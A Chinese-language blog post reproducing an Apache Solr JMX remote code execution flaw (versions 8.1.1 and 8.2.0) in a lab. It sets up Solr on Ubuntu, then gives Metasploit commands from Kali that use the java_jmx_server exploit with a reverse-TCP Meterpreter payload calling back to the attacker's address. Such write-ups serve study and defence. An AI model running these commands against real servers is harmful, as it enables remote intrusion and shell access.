Apache Solr JMX服务远程代码执行复现

  1. 环境搭建
  2. 漏洞复现

这个漏洞是由于配置的时候默认开启了JMX(版本8.1.1和8.2.0)

环境搭建

  • Kali:192.168.43.141
  • Ubuntu:192.168.43.131
    首先我们在Ubuntu上安装 Solr
    1
    2
    wget https://mirrors.tuna.tsinghua.edu.cn/apache/lucene/solr/8.2.0/solr-8.2.0.zip
    unzip solr-8.2.0.zip

进入到bin目录下,启动Solr

1
./solr start -force


显示这样,说明环境搭建好了

查看bin目录下的solr.in.sh

看这里开启了JMX,默认端口为18983

漏洞复现

我们在kali上使用msfconsole进行攻击

1
2
3
4
5
6
7
8
9
#设置exp
use exploit/multi/misc/java_jmx_server
set RHOST 192.168.43.131
set RPORT 18983

#设置监听
set payload java/meterpreter/reverse_tcp
set LHOST 192.168.43.141
run

虽然这个漏洞利用起来很方便的,但是影响范围比较小,其实也就两个版本可以利用,其他版本开启这个配置的几率也不高,留着以后有机会打吧。


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论,也可以邮件至 sher10cksec@foxmail.com

文章标题:Apache Solr JMX服务远程代码执行复现

本文作者:sher10ck

发布时间:2019-11-25, 15:51:46

最后更新:2020-01-13, 12:48:31

原始链接:http://sherlocz.github.io/2019/11/25/Apache-Solr-JMX服务远程代码执行复现/

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录